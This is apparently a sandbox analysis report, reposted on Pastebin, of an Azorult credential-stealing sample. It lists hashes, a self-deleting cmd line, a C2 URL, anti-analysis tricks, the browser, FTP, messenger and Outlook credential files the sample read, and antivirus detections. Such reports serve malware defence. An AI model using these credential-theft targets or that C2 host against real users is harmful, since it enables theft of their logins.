API tools faq
paste
Advertisement
paladin316

azorult_81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949_2019-08-20_23_50.txt

paladin316
Aug 20th, 2019
1,457
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.14 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "Azorult"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949"
  7. * File Size: 263680
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949"
  10. * MD5: "4fe6ded31faa87734843abc02e4a9777"
  11. * SHA1: "688a240ee32a8e249fa9dec8f9d378654112c93c"
  12. * SHA512: "250c3578ec041b2184ad588517b4d3917dda723a295fba667f8dac80a62febaf351a6284006769bc5b844ba39066b87c4cd37d1b1cb6a99c40a34fa078549055"
  13. * CRC32: "3DA15A81"
  14. * SSDEEP: "3072:07cMo2pzNq2Qs06gjDq+NwZXhPvgPQX/QF0f+NIWxXFNzogczuKDrcuiaas+ylzt:b2k9njDqNOPQ1fhwL5cqbjpyZ+zszFX"
  15.  
  16. * Process Execution:
  17. "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe",
  18. "cmd.exe",
  19. "timeout.exe",
  20. "services.exe",
  21. "WmiApSrv.exe",
  22. "svchost.exe",
  23. "WmiPrvSE.exe",
  24. "WmiPrvSE.exe",
  25. "svchost.exe",
  26. "taskhost.exe",
  27. "WmiPrvSE.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe\"",
  32. "C:\\Windows\\system32\\lsass.exe",
  33. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  34. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  35. "C:\\Windows\\system32\\timeout.exe 3",
  36. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  37. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
  38.  
  39.  
  40. * Signatures Detected:
  41.  
  42. "Description": "Creates RWX memory",
  43. "Details":
  44.  
  45.  
  46. "Description": "A process attempted to delay the analysis task.",
  47. "Details":
  48.  
  49. "Process": "svchost.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds"
  50.  
  51.  
  52. "Process": "WmiPrvSE.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds"
  53.  
  54.  
  55.  
  56.  
  57. "Description": "A process created a hidden window",
  58. "Details":
  59.  
  60. "Process": "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe -> C:\\Windows\\System32\\cmd.exe"
  61.  
  62.  
  63.  
  64.  
  65. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  66. "Details":
  67.  
  68. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  69.  
  70.  
  71. "suspicious_request": "http://normpost.club/index.php"
  72.  
  73.  
  74. "suspicious_request": "http://ip-api.com/json"
  75.  
  76.  
  77.  
  78.  
  79. "Description": "Performs some HTTP requests",
  80. "Details":
  81.  
  82. "url": "http://normpost.club/index.php"
  83.  
  84.  
  85. "url": "http://ip-api.com/json"
  86.  
  87.  
  88.  
  89.  
  90. "Description": "Deletes its original binary from disk",
  91. "Details":
  92.  
  93.  
  94. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  95. "Details":
  96.  
  97. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 16089573 times"
  98.  
  99.  
  100. "Spam": "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe (1612) called API NtQueryFullAttributesFile 24271 times"
  101.  
  102.  
  103.  
  104.  
  105. "Description": "Steals private information from local Internet browsers",
  106. "Details":
  107.  
  108. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  109.  
  110.  
  111. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  112.  
  113.  
  114. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  115.  
  116.  
  117. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  118.  
  119.  
  120. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  121.  
  122.  
  123. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  124.  
  125.  
  126. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  127.  
  128.  
  129. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  130.  
  131.  
  132. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  133.  
  134.  
  135. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  136.  
  137.  
  138. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  139.  
  140.  
  141. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  142.  
  143.  
  144. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  145.  
  146.  
  147. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  148.  
  149.  
  150. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  151.  
  152.  
  153. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  154.  
  155.  
  156. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  157.  
  158.  
  159. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  160.  
  161.  
  162. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  163.  
  164.  
  165.  
  166.  
  167. "Description": "Collects information about installed applications",
  168. "Details":
  169.  
  170. "Program": "Google Update Helper"
  171.  
  172.  
  173.  
  174.  
  175. "Program": "Microsoft Excel MUI 2013"
  176.  
  177.  
  178. "Program": "Microsoft Outlook MUI 2013"
  179.  
  180.  
  181.  
  182.  
  183. "Program": "Google Chrome"
  184.  
  185.  
  186. "Program": "Adobe Flash Player 29 NPAPI"
  187.  
  188.  
  189. "Program": "Adobe Flash Player 29 ActiveX"
  190.  
  191.  
  192. "Program": "Microsoft DCF MUI 2013"
  193.  
  194.  
  195. "Program": "Microsoft Access MUI 2013"
  196.  
  197.  
  198. "Program": "Microsoft Office Proofing Tools 2013 - English"
  199.  
  200.  
  201. "Program": "Adobe Acrobat Reader DC"
  202.  
  203.  
  204. "Program": "Microsoft Publisher MUI 2013"
  205.  
  206.  
  207. "Program": "Microsoft Office Shared MUI 2013"
  208.  
  209.  
  210. "Program": "Microsoft Office OSM MUI 2013"
  211.  
  212.  
  213. "Program": "Microsoft InfoPath MUI 2013"
  214.  
  215.  
  216. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  217.  
  218.  
  219. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  220.  
  221.  
  222. "Program": "Microsoft Word MUI 2013"
  223.  
  224.  
  225. "Program": "Microsoft OneDrive"
  226.  
  227.  
  228. "Program": "Microsoft Groove MUI 2013"
  229.  
  230.  
  231. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  232.  
  233.  
  234.  
  235.  
  236. "Program": "Microsoft Access Setup Metadata MUI 2013"
  237.  
  238.  
  239. "Program": "Microsoft Office OSM UX MUI 2013"
  240.  
  241.  
  242. "Program": "Java Auto Updater"
  243.  
  244.  
  245. "Program": "Microsoft PowerPoint MUI 2013"
  246.  
  247.  
  248. "Program": "Microsoft Office Professional Plus 2013"
  249.  
  250.  
  251. "Program": "Adobe Refresh Manager"
  252.  
  253.  
  254. "Program": "Microsoft Office Proofing 2013"
  255.  
  256.  
  257. "Program": "Microsoft Lync MUI 2013"
  258.  
  259.  
  260.  
  261.  
  262. "Program": "Microsoft OneNote MUI 2013"
  263.  
  264.  
  265.  
  266.  
  267. "Description": "File has been identified by 55 Antiviruses on VirusTotal as malicious",
  268. "Details":
  269.  
  270. "MicroWorld-eScan": "Trojan.GenericKD.32231080"
  271.  
  272.  
  273. "FireEye": "Generic.mg.4fe6ded31faa8773"
  274.  
  275.  
  276. "CAT-QuickHeal": "Trojanpws.Azorult"
  277.  
  278.  
  279. "ALYac": "Spyware.Infostealer.Azorult"
  280.  
  281.  
  282. "Cylance": "Unsafe"
  283.  
  284.  
  285. "CrowdStrike": "win/malicious_confidence_90% (W)"
  286.  
  287.  
  288. "Alibaba": "TrojanPSW:Win32/Azorult.91e5cc0b"
  289.  
  290.  
  291. "K7GW": "Trojan ( 005551291 )"
  292.  
  293.  
  294. "K7AntiVirus": "Trojan ( 005551291 )"
  295.  
  296.  
  297. "Arcabit": "Trojan.Generic.D1EBCEA8"
  298.  
  299.  
  300. "TrendMicro": "TROJ_FRS.VSNW09H19"
  301.  
  302.  
  303. "Symantec": "Trojan.Gen.MBT"
  304.  
  305.  
  306. "APEX": "Malicious"
  307.  
  308.  
  309. "Avast": "Win32:Trojan-gen"
  310.  
  311.  
  312. "Kaspersky": "Trojan-PSW.Win32.Azorult.zcl"
  313.  
  314.  
  315. "BitDefender": "Trojan.GenericKD.32231080"
  316.  
  317.  
  318. "NANO-Antivirus": "Trojan.Win32.Stealer.fvacre"
  319.  
  320.  
  321. "Paloalto": "generic.ml"
  322.  
  323.  
  324. "ViRobot": "Trojan.Win32.Z.Azorult.263680"
  325.  
  326.  
  327. "Ad-Aware": "Trojan.GenericKD.32231080"
  328.  
  329.  
  330. "Emsisoft": "Trojan.Crypt (A)"
  331.  
  332.  
  333. "Comodo": "Malware@#3oqlddld8it08"
  334.  
  335.  
  336. "F-Secure": "Trojan.TR/Crypt.Agent.aybfj"
  337.  
  338.  
  339. "DrWeb": "Trojan.PWS.Stealer.24943"
  340.  
  341.  
  342. "Zillya": "Trojan.Azorult.Win32.13"
  343.  
  344.  
  345. "Invincea": "heuristic"
  346.  
  347.  
  348. "McAfee-GW-Edition": "RDN/Generic.grp"
  349.  
  350.  
  351. "Trapmine": "malicious.high.ml.score"
  352.  
  353.  
  354. "Sophos": "Mal/GandCrab-H"
  355.  
  356.  
  357. "SentinelOne": "DFI - Malicious PE"
  358.  
  359.  
  360. "Jiangmin": "Trojan.Sodinokibi.a"
  361.  
  362.  
  363. "Avira": "TR/Crypt.Agent.aybfj"
  364.  
  365.  
  366. "MAX": "malware (ai score=100)"
  367.  
  368.  
  369. "Antiy-AVL": "TrojanPSW/Win32.AZORult"
  370.  
  371.  
  372. "Microsoft": "Trojan:Win32/Predator.BS!MTB"
  373.  
  374.  
  375. "Endgame": "malicious (high confidence)"
  376.  
  377.  
  378. "AegisLab": "Trojan.Win32.Azorult.i!c"
  379.  
  380.  
  381. "ZoneAlarm": "Trojan-PSW.Win32.Azorult.zcl"
  382.  
  383.  
  384. "GData": "Trojan.GenericKD.32231080"
  385.  
  386.  
  387. "AhnLab-V3": "Trojan/Win32.MalPe.R285289"
  388.  
  389.  
  390. "Acronis": "suspicious"
  391.  
  392.  
  393. "McAfee": "RDN/Generic.grp"
  394.  
  395.  
  396. "TACHYON": "Trojan-PWS/W32.Azorult.263680"
  397.  
  398.  
  399. "VBA32": "BScope.Trojan.Downloader"
  400.  
  401.  
  402. "Malwarebytes": "Trojan.MalPack.GS.Generic"
  403.  
  404.  
  405. "ESET-NOD32": "a variant of Win32/Kryptik.GVHC"
  406.  
  407.  
  408. "TrendMicro-HouseCall": "Trojan.Win32.SODINOK.SM.hp"
  409.  
  410.  
  411. "Rising": "Trojan.Generic@ML.94 (RDMK:4f2kJIUgKUxgaCN/39geFA)"
  412.  
  413.  
  414. "MaxSecure": "Trojan.Malware.300983.susgen"
  415.  
  416.  
  417. "Fortinet": "W32/Kryptik.GVOI!tr"
  418.  
  419.  
  420. "Webroot": "W32.Trojan.Gen"
  421.  
  422.  
  423. "AVG": "Win32:Trojan-gen"
  424.  
  425.  
  426. "Cybereason": "malicious.ee32a8"
  427.  
  428.  
  429. "Panda": "Trj/GdSda.A"
  430.  
  431.  
  432. "Qihoo-360": "Win32/Trojan.PSW.f70"
  433.  
  434.  
  435.  
  436.  
  437. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  438. "Details":
  439.  
  440.  
  441. "Description": "Harvests credentials from local FTP client softwares",
  442. "Details":
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  445.  
  446.  
  447.  
  448.  
  449. "Description": "Harvests information related to installed instant messenger clients",
  450. "Details":
  451.  
  452. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  453.  
  454.  
  455.  
  456.  
  457. "Description": "Harvests information related to installed mail clients",
  458. "Details":
  459.  
  460. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  461.  
  462.  
  463. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  464.  
  465.  
  466. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  467.  
  468.  
  469. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  470.  
  471.  
  472. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  473.  
  474.  
  475. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  476.  
  477.  
  478. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  479.  
  480.  
  481. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  482.  
  483.  
  484. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  485.  
  486.  
  487. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  488.  
  489.  
  490. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  491.  
  492.  
  493. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  494.  
  495.  
  496. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  497.  
  498.  
  499. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  500.  
  501.  
  502. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  503.  
  504.  
  505. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  506.  
  507.  
  508. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  509.  
  510.  
  511. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  512.  
  513.  
  514. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  515.  
  516.  
  517. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  518.  
  519.  
  520. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  521.  
  522.  
  523.  
  524.  
  525. "Description": "Collects information to fingerprint the system",
  526. "Details":
  527.  
  528.  
  529.  
  530. * Started Service:
  531. "VaultSvc",
  532. "wmiApSrv"
  533.  
  534.  
  535. * Mutexes:
  536. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  537. "Global\\RefreshRA_Mutex_Lib",
  538. "Global\\RefreshRA_Mutex",
  539. "Global\\RefreshRA_Mutex_Flag",
  540. "Global\\WmiApSrv"
  541.  
  542.  
  543. * Modified Files:
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  545. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  546. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  547. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  548. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  549. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  550. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  551. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  552. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  553. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  554. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  555. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  556. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  557. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  558. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  559. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  560. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  561. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  562. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  563. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  564. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  565. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  566. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  567. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  568. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  569. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  570. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  571. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  572. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  573. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  574. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  575. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  576. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  577. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  578. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  579. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  580. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  581. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  583. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  584. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  585. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  586. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  587. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  588. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  589. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  590. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  591. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  592. "C:\\Users\\user\\AppData\\Local\\Temp\\335162341510543816632285.tmp",
  593. "C:\\Users\\user\\AppData\\Local\\Temp\\33567468582923687909264.tmp",
  594. "C:\\Users\\user\\AppData\\Local\\Temp\\335675314371805155542307.tmp",
  595. "C:\\Users\\user\\AppData\\Local\\Temp\\33567609264422488998616.tmp",
  596. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  597. "\\??\\WMIDataDevice",
  598. "\\??\\PIPE\\samr",
  599. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  600. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  601. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  602. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  603. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  604. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  605. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  606. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  607.  
  608.  
  609. * Deleted Files:
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\335162341510543816632285.tmp",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\33567468582923687909264.tmp",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\335675314371805155542307.tmp",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\33567609264422488998616.tmp",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  636. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  637. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  638. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  639. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  640. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  641. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  642. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  643. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  644. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  645. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  646. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  647. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  648. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  649. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  650. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  651. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
